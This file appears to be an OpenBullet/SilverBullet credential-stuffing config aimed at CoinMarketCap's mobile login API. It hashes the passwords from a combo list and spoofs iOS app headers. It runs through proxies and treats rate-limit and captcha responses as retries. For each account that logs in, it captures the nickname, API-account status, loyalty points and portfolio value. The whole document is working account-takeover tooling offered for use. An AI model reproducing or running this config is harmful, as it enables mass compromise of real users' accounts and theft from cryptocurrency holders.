[SETTINGS]
{
  "Name": "CoinMarketCap",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2024-08-01T03:33:33.3333333-07:00",
  "AdditionalInfo": "github.com/0xSums",
  "RequiredPlugins": [],
  "Author": "✧",
  "Version": "[t.me/imSums]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Default",
  "AllowedWordlist2": "Email",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "CoinMarketCap",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#SHA512 FUNCTION Hash SHA512 "<PASS>" -> VAR "SHA" 

#/auth/v4/user/login REQUEST POST "https://api.coinmarketcap.com/auth/v4/user/login" 
  CONTENT "{\"email\":\"<USER>\",\"shaPassword\":\"<SHA>\",\"platform\":\"mobile\",\"os\":\"iOS\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER "User-Agent: Dart/3.2 (dart:io)" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "devicename: iPhone" 
  HEADER "platform: ios" 
  HEADER "appframework: flutter" 
  HEADER "devicemodel: iPhone" 
  HEADER "appbuild: 53" 
  HEADER "appversion: 4.50.0" 

#200_OK? KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"code\":10011" 
    KEY "\"error_code\":\"10219\"" 
  KEYCHAIN Success OR 
    KEY "eyJ" 
  KEYCHAIN Retry OR 
    KEY "<RESPONSECODE>" EqualTo "429" 
    KEY "\"error_message\":\"Need Captcha" 

#token PARSE "<SOURCE>" JSON "token" -> VAR "X" 

#hasApiAccount PARSE "<SOURCE>" JSON "hasApiAccount" -> VAR "HA" 

#nickname PARSE "<SOURCE>" JSON "nickname" CreateEmpty=FALSE -> CAP "User" 

#API FUNCTION Translate 
  KEY "True" VALUE "✓" 
  KEY "False" VALUE "✗" 
  "<HA>" -> CAP "API" 

#/asset/v3/loyalty/ REQUEST POST "https://api.coinmarketcap.com/asset/v3/loyalty/user-point-summary" 
  CONTENT "{}" 
  CONTENTTYPE "application/json" 
  COOKIE "Authorization: <X>" 
  HEADER "User-Agent: Dart/3.2 (dart:io)" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "devicename: iPhone" 
  HEADER "platform: ios" 
  HEADER "appframework: flutter" 
  HEADER "devicemodel: iPhone" 
  HEADER "appbuild: 53" 
  HEADER "appversion: 4.50.0" 
  HEADER "Authorization: <X>" 

#point PARSE "<SOURCE>" JSON "point" CreateEmpty=FALSE -> CAP "Diamonds" 

#/asset/v4/portfolio/ REQUEST POST "https://api.coinmarketcap.com/asset/v4/portfolio/group/queryAll" 
  CONTENT "{}" 
  CONTENTTYPE "application/json" 
  COOKIE "Authorization: <X>" 
  HEADER "User-Agent: Dart/3.2 (dart:io)" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "devicename: iPhone" 
  HEADER "platform: ios" 
  HEADER "appframework: flutter" 
  HEADER "devicemodel: iPhone" 
  HEADER "appbuild: 53" 
  HEADER "appversion: 4.50.0" 
  HEADER "Authorization: <X>" 

#totalAmount PARSE "<SOURCE>" JSON "totalAmount" -> VAR "TA" 

#$? KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "<TA>" EqualTo "0" 

#RegexMatch FUNCTION RegexMatch "\\d+\\.\\d{2}" "<TA>" -> VAR "P1" 

#Portfolio FUNCTION Constant "$<P1>" -> CAP "Portfolio" 

